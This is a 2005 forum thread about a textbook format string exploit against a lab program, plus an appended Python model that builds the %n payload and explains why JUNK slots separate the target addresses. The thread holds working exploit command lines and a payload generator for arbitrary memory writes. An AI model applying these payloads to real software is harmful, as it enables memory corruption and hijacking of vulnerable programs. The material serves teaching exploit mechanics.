-
June 22nd, 2005, 08:48 PM
#1
Junior Member
Format string: Question
I found a format string tutorial in a book. Have understood the basic concept, but have a question about one of the examples. The aim is to write the address 0xddccbbaa into a static int variable declared in a program fmt_vuln. The book says that first you write 0xaa like this:
./fmt_vuln `printf "\x70\x97\x04\x08"`%x.%x.%153x%n
which works. Then, it says that in order to write 0xbb we need to increment the byte count up to 187, which is 0xbb in decimal. This argument could be anything; it just has to be four bytes long and must be located after the first arbitrary memory address of 0x08049770. The word "JUNK" is four bytes and is fine. Similarly for writing 0xcc and 0xdd.
So according to the book, the entire write procedure would be:
./fmt_vuln `printf "\x70\x97\x04\x08JUNK\x71\x97\x04\x08JUNK\x72\x97\x04\x08JUNK\x73\x97\x04\x08"`%x.%x.%129x%n%17x%n%17x%n%17x%n
My question is: Why do we need the four bytes of JUNK separating the addresses even though we can control the number of bytes by using the size of %x as in %129x?
Thanks
-
June 22nd, 2005, 09:51 PM
#2
Wild guess: Required memory space padding. This isn't an uncommon practice. If you ping certain OSes and look at a packet capture, you'll see they pad the packets with "junk" like 1234567890....
--Th13
Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden
-
June 23rd, 2005, 12:12 AM
#3
Now here's a first :
I haven't a clue as to how to respond ............... yet the answer from TH13 made perfect sense
is this a sign of advancement into geekhood ?
or is it just advancing old age
[edit]
the greens are from me for the confusion ........
so now I'm in my SIXTIES FFS
WTAF, how did that happen, so no more alterations to the sig, it will remain as is now
Beware of Geeks bearing GIF's
come and waste the day :P at The Taz Zone
-
June 23rd, 2005, 12:25 AM
#4
Junior Member
I thought about the padding, but the problem with that is that each of the writes (0xaa, 0xbb,...) is two hex digits, which is equal to one byte. Now each memory address can hold one byte. So where is the padding (that too, 4 bytes) required??
This is confusing, Help!!
-
June 23rd, 2005, 01:14 AM
#5
This is a very interesting analysis of format string bugs. I've been looking over it most of the afternoon and decided to share. Even if you can't use it it's got a lot of good information.
Analysis of Format String Bugs (PDF)
-
June 23rd, 2005, 12:41 PM
#6
Junior Member
I am pretty sure that TheHorse is correct in his assumption that these are used for padding. You are attempting to write an address into some variable and it is necessary to make sure the bytes are properly aligned in memory. This is similar to how the return address in buffer overflows has to be properly aligned to fit into the correct memory location. If things are not properly aligned (padded), then the wrong address would get written.
An ancient Chinese man once told me: "The hotter the tea, the bigger the wang."
My tea is extra hot.
-
June 23rd, 2005, 03:31 PM
#7
Modern processors actually take longer to read just one byte instead of 4. IIRC it's because of the way the address bus accesses memory. So it could be some compiler optimization. You store just one byte but the compiler modifies it to 4 (the actual byte and 3 bytes padded). That could improve the speed of the program (size-speed trade-off).
One way to find out though is to run your program (including the 'exploit') using a debugger. That will give you chance to look at what the stack actually looks like when it gets 'hit'.
Oliver's Law:
Experience is something you don't get until just after you need it.
-
June 23rd, 2005, 03:38 PM
#8
SirDice is right, most processors read blocks of 4 bytes or more (normally whatever the word size is, although it varies slightly), so optimization is probably a good guess. Is it possible to contact the author for comment?
With all the subtlety of an artillery barrage / Follow blindly, for the true path is sketchy at best. .: Bring OS X to x86!:.
And no one can recall the gentle features of the queen's face that fair day, when this land rested in holy peace and everyone had love to love with.
-
June 23rd, 2005, 04:01 PM
#9
Junior Member
But the compiler doesn't see the format string. The format string is entered as a parameter to an already compiled (exploitable) program (usually taking advantage of printf(string) instead of printf("%s", string)). So the compiler itself does not ever see the format string because it is entered as a parameter. I am almost 100% sure that this is to ensure that the data being entered (the address to be stored) lines up correctly in memory (dealing with word size).
An ancient Chinese man once told me: "The hotter the tea, the bigger the wang."
My tea is extra hot.
-
June 23rd, 2005, 04:51 PM
#10
Junior Member
Padding seems most obvious but HOW does it need padding? As I wrote earlier each of the writes (0xaa, 0xbb,...) is two hex digits, which is equal to one byte. Now each memory address can hold one byte. So where is the padding (that too, 4 bytes) required??
The processor does read 4 bytes (1 word) but that would mean that it reads all the four consecutive memory addresses. There is no need for the junk, which in any case would add to one byte in the address to make 5 bytes not 4.
Hopefully we can sort this out :/
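The argument walk that the question in post #1 and the recap in post #10 are about, as an added example that is not from the book and not code posted by anyone in this thread: a small Python model of how a 32-bit printf() consumes one 4-byte stack slot for every conversion it meets. In fmt_vuln the format string itself sits on the stack, so after the three words that "%x.%x.%<width>x" eat (their values below are constructed; only the assumption that they print 13 bytes matters, and the book's real stack differs), the next slots are the bytes of the payload. Each %n takes the next slot as the address to write, and each %<width>x in front of it takes one slot too, which is why consecutive target addresses must be exactly one 4-byte slot apart. The second function builds the book's payload from a target address and value, deriving the 129 and 17 widths, and the model is run both with and without the JUNK slots. The model is not real printf and is not a working exploit; it only reproduces the bookkeeping.

```python
"""Model of printf's argument walk for the book's fmt_vuln payload (added example)."""
import struct

TARGET = 0x08049770     # address of the static int in fmt_vuln (from the post)
JUNK = b"JUNK"          # any four bytes; only the size matters

# Constructed stand-ins for the three stack words that printf consumes with
# "%x.%x.%<width>x" before it reaches the start of the format string.
# Their hex forms are 8, 3 and 8 characters long, so "%x.%x." contributes
# 13 bytes of output.  The words on the book's stack differ; the widths
# derived below only depend on this assumed 13.
LEADING_WORDS = [0xbffff3e0, 0x1c0, 0xb7ff9740]
LEADING_OUTPUT = 13


def build_payload(target, value, junk=JUNK, leading_output=LEADING_OUTPUT):
    """Return addr0 JUNK addr1 JUNK addr2 JUNK addr3 + the %x/%n directives.

    value is written one byte at a time, least-significant byte first, by a
    %n aimed at target, target+1, target+2 and target+3.  Each %n is preceded
    by a %<width>x that raises the byte count AND consumes one 4-byte
    argument slot, so consecutive addresses must be one slot apart: that
    slot is the JUNK.
    """
    value_bytes = struct.pack("<I", value)
    prefix = junk.join(struct.pack("<I", target + i) for i in range(4))
    # First %n: len(prefix) + leading_output + width must end in value_bytes[0].
    width = (value_bytes[0] - leading_output - len(prefix)) % 256
    if width < 8:           # an 8-digit hex word needs at least 8 columns
        width += 256
    fmt = "%%x.%%x.%%%dx%%n" % width
    prev = value_bytes[0]
    for b in value_bytes[1:]:
        delta = (b - prev) % 256        # only the low byte of the count matters
        if delta < 8:
            delta += 256
        fmt += "%%%dx%%n" % delta
        prev = b
    return prefix + fmt.encode()


def simulate_printf(payload, leading_words=LEADING_WORDS):
    """Walk printf's 4-byte argument slots the way a 32-bit vfprintf would.

    Model, not real printf: the argument list is leading_words followed by
    the payload itself, because in fmt_vuln the format string lives on the
    stack right after those words.  Returns the bytes stored by every %n
    (as {address: byte}) and the list of (address, count) writes.
    """
    padded = payload + b"\0" * (-len(payload) % 4)
    slots = list(leading_words) + [
        struct.unpack("<I", padded[i:i + 4])[0] for i in range(0, len(padded), 4)]
    memory, writes, count, slot, i = {}, [], 0, 0, 0
    while i < len(payload):
        if payload[i] != 0x25:          # literal byte ('%' is 0x25): output +1
            count += 1
            i += 1
            continue
        i += 1
        width = 0
        while payload[i:i + 1].isdigit():
            width = width * 10 + payload[i] - 0x30
            i += 1
        conv = chr(payload[i])
        i += 1
        if slot >= len(slots):
            raise IndexError("printf walked past the payload at slot %d" % slot)
        arg = slots[slot]               # every conversion eats exactly one slot
        slot += 1
        if conv == "x":
            count += max(width, len("%x" % arg))
        elif conv == "n":               # store the running count as a 4-byte int
            writes.append((arg, count))
            for k, b in enumerate(struct.pack("<I", count)):
                memory[arg + k] = b
        else:
            raise ValueError("conversion %%%s not modelled" % conv)
    return memory, writes


def read_u32(memory, addr):
    return struct.unpack("<I", bytes(memory.get(addr + k, 0) for k in range(4)))[0]


def value_written(payload, target=TARGET):
    """Run the model and return (value now at target, list of %n writes)."""
    memory, writes = simulate_printf(payload)
    return read_u32(memory, target), writes


if __name__ == "__main__":
    for junk in (JUNK, b""):
        payload = build_payload(TARGET, 0xddccbbaa, junk=junk)
        value, writes = value_written(payload)
        print("junk=%r payload=%r" % (junk, payload))
        for addr, count in writes:
            print("  %%n -> 0x%08x = %d" % (addr, count))
        print("  *0x%08x = 0x%08x" % (TARGET, value))
```

With the JUNK slots the four %n land on 0x08049770 through 0x08049773 with counts 170, 187, 204 and 221, and the int at the target reads 0xddccbbaa (the three bytes after it are zeroed by the overlapping 4-byte writes). Without them the second %17x consumes the second address as its argument, the second %n lands on 0x08049772, and the third and fourth %n are aimed at words made from the format string's own "%x.%" bytes, which in a real process is an unmapped address and a crash.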